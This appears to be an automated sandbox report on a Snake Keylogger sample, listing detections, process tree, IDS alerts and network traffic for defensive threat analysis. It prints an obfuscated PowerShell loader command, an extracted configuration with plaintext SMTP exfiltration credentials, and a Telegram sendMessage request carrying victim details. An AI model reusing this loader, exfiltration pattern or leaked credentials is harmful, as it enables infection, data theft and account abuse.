Edit tour

Windows Analysis Report
TjoY7n65om.exe

Overview

General Information

Sample name:	TjoY7n65om.exe renamed because original name is a hash value
Original sample name:	fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
Analysis ID:	1588340
MD5:	6a5b8c6057dff681139fd609ffc6b21d
SHA1:	b37b7a2168980b4772978a640ebf5a02f41697e6
SHA256:	fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Script Execution From Temp Folder

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

TjoY7n65om.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\TjoY7n65om.exe" MD5: 6A5B8C6057DFF681139FD609FFC6B21D)

powershell.exe (PID: 6464 cmdline: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bivejens.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\Bivejens.exe" MD5: 6A5B8C6057DFF681139FD609FFC6B21D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "atu.petronila@burgosatu.es", "Password": "55#cHsR%iCPw", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Bivejens.exe PID: 8056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bivejens.exe PID: 8056	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TjoY7n65om.exe", ParentImage: C:\Users\user\Desktop\TjoY7n65om.exe, ParentProcessId: 7844, ParentProcessName: TjoY7n65om.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , ProcessId: 6464, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TjoY7n65om.exe", ParentImage: C:\Users\user\Desktop\TjoY7n65om.exe, ParentProcessId: 7844, ParentProcessName: TjoY7n65om.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" , ProcessId: 6464, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:41:20.673469+0100	2803305	3	Unknown Traffic	192.168.2.10	49931	104.21.80.1	443	TCP
2025-01-11T00:41:21.953171+0100	2803305	3	Unknown Traffic	192.168.2.10	49943	104.21.80.1	443	TCP
2025-01-11T00:41:23.274530+0100	2803305	3	Unknown Traffic	192.168.2.10	49954	104.21.80.1	443	TCP
2025-01-11T00:41:26.003606+0100	2803305	3	Unknown Traffic	192.168.2.10	49974	104.21.80.1	443	TCP
2025-01-11T00:41:28.646313+0100	2803305	3	Unknown Traffic	192.168.2.10	49984	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:41:18.936105+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49918	132.226.247.73	80	TCP
2025-01-11T00:41:20.107915+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49918	132.226.247.73	80	TCP
2025-01-11T00:41:21.404875+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49937	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:41:13.947470+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49883	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:41:30.912977+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49987	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "atu.petronila@burgosatu.es", "Password": "55#cHsR%iCPw", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Virustotal: Detection: 65%			Perma Link

Multi AV Scanner detection for submitted file

Source: TjoY7n65om.exe	ReversingLabs: Detection: 50%
Source: TjoY7n65om.exe	Virustotal: Detection: 65%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219187A8 CryptUnprotectData,		5_2_219187A8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21918EF1 CryptUnprotectData,		5_2_21918EF1

Source: TjoY7n65om.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49925 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49987 version: TLS 1.2

Source: TjoY7n65om.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00402868 LdrInitializeThunk,FindFirstFileW,	5_2_00402868
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_004065C7 FindFirstFileW,FindClose,	5_2_004065C7
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindNextFileW,FindClose,LdrInitializeThunk,LdrInitializeThunk,	5_2_00405996

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21092C19h	5_2_21092968
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 210931E0h	5_2_21092DC8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109CF49h	5_2_2109CCA0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21090D0Dh	5_2_21090B30
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21091697h	5_2_21090B30
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 210931E0h	5_2_2109310E
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109D7F9h	5_2_2109D550
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109DC51h	5_2_2109D9A8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 210931E0h	5_2_21092DB8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109FAB9h	5_2_2109F810
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_21090040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_21090853
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109D3A1h	5_2_2109D0F8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109EDB1h	5_2_2109EB08
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109F209h	5_2_2109EF60
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109F661h	5_2_2109F3B8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109E0A9h	5_2_2109DE00
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109E501h	5_2_2109E258
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_21090673
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2109E959h	5_2_2109E6B0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21910B99h	5_2_219108F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21919280h	5_2_21918FB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21917EB5h	5_2_21917B78
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21911449h	5_2_219111A0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191ECA6h	5_2_2191E9D8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219118A1h	5_2_219115F8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191CCB6h	5_2_2191C9E8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191C826h	5_2_2191C558
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191E816h	5_2_2191E548
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21910FF1h	5_2_21910D48
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21910741h	5_2_21910498
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21916733h	5_2_21916488
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191E386h	5_2_2191E0B8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191C396h	5_2_2191C0C8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219132B1h	5_2_21913008
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219162D9h	5_2_21916030
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191BF06h	5_2_2191BC38
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191DEF6h	5_2_2191DC28
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219102E9h	5_2_21910040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21913709h	5_2_21913460
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191DA66h	5_2_2191D798
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21915A29h	5_2_21915780
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191FA56h	5_2_2191F788
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21912E59h	5_2_21912BB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191BA76h	5_2_2191B7A8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21915E81h	5_2_21915BD8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191B5E6h	5_2_2191B318
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219125A9h	5_2_21912300
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191D5D6h	5_2_2191D308
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219179C9h	5_2_21917720
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219155D1h	5_2_21915328
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21912A01h	5_2_21912758
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21912151h	5_2_21911EA8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21915179h	5_2_21914ED0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21917571h	5_2_219172C8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191F5C6h	5_2_2191F2F8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21916CC1h	5_2_21916A18
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219148C9h	5_2_21914620
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21911CF9h	5_2_21911A50
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21917119h	5_2_21916E70
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191D146h	5_2_2191CE78
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21914D21h	5_2_21914A78
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2191F136h	5_2_2191EE68
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21989478h	5_2_21989180
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21986347h	5_2_21985FD8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21986970h	5_2_21986678
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21985066h	5_2_21984D98
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21987C90h	5_2_21987998
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198EA88h	5_2_2198E790
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21982756h	5_2_21982488
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198BF80h	5_2_2198BC88
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198154Eh	5_2_21981280
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21985986h	5_2_219856B8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21988FB0h	5_2_21988CB8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198FDA8h	5_2_2198FAB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21983076h	5_2_21982DA8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198D2A0h	5_2_2198CFA8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21981E47h	5_2_21981BA0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198A798h	5_2_2198A4A0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198A2D0h	5_2_21989FD8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198079Eh	5_2_219804D0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219877C8h	5_2_219874D0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21983996h	5_2_219836C8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198E5C0h	5_2_2198E2C8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198BAB8h	5_2_2198B7C0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219822C6h	5_2_21981FF8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198B5F0h	5_2_2198B2F8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219810BEh	5_2_21980DF0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21988AE8h	5_2_219887F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219842B6h	5_2_21983FE8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198F8E0h	5_2_2198F5E8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198CDD8h	5_2_2198CAE0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21982BE6h	5_2_21982918
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198C910h	5_2_2198C618
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219819DEh	5_2_21981710
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21989E08h	5_2_21989B10
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21984BD7h	5_2_21984908
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21987300h	5_2_21987008
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198E0F8h	5_2_2198DE00
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21983506h	5_2_21983238
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198DC30h	5_2_2198D938
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198B128h	5_2_2198AE30
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219854F6h	5_2_21985228
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21988620h	5_2_21988328
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198F418h	5_2_2198F120
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21983E26h	5_2_21983B58
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198EF50h	5_2_2198EC58
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198C448h	5_2_2198C150
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21985E16h	5_2_21985B48
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21989940h	5_2_21989648
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198030Eh	5_2_21980040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21986E38h	5_2_21986B40
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21984746h	5_2_21984478
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198D768h	5_2_2198D470
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 2198AC60h	5_2_2198A968
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21980C2Eh	5_2_21980960
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 21988158h	5_2_21987E60
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B1FE8h	5_2_219B1CF0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B0CC8h	5_2_219B09D0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B0801h	5_2_219B0508
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B1658h	5_2_219B1360
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B1190h	5_2_219B0E98
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B1B20h	5_2_219B1828
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then jmp 219B0338h	5_2_219B0040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21B33E70
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21B309EA
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21B30A10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49987 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
